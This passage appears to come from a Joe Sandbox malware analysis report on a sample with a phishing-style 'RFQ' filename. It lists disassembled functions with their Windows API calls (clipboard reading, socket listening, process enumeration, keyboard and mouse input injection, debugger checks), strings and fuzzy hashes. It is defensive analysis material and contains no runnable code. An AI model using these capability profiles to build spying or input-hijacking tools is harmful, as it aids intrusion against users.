                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                        • String ID:
                                                        • API String ID: 1158019794-0
                                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                        Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                        Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                        Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_strncmp
                                                        • String ID: @oH$\$^$h
                                                        • API String ID: 2175499884-3701065813
                                                        • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                        • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                        • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                        • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                        Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                        • String ID:
                                                        • API String ID: 540024437-0
                                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                        Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                        • API String ID: 0-2872873767
                                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                        Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                        • __wsplitpath.LIBCMT ref: 00475644
                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                        • _wcscat.LIBCMT ref: 00475657
                                                        • __wcsicoll.LIBCMT ref: 0047567B
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID:
                                                        • API String ID: 2547909840-0
                                                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                        Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                        • FindClose.KERNEL32(?), ref: 004525FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                        • String ID: *.*$\VH
                                                        • API String ID: 2786137511-2657498754
                                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                        Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID: pqI
                                                        • API String ID: 2579439406-2459173057
                                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                        Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __wcsicoll.LIBCMT ref: 00433349
                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                        • __wcsicoll.LIBCMT ref: 00433375
                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicollmouse_event
                                                        • String ID: DOWN
                                                        • API String ID: 1033544147-711622031
                                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                        Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: KeyboardMessagePostState$InputSend
                                                        • String ID:
                                                        • API String ID: 3031425849-0
                                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                        Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 4170576061-0
                                                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                        Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                        • IsWindowVisible.USER32 ref: 0047A368
                                                        • IsWindowEnabled.USER32 ref: 0047A378
                                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                        • IsIconic.USER32 ref: 0047A393
                                                        • IsZoomed.USER32 ref: 0047A3A1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                        Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                        • CoUninitialize.OLE32 ref: 0047863C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                        Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
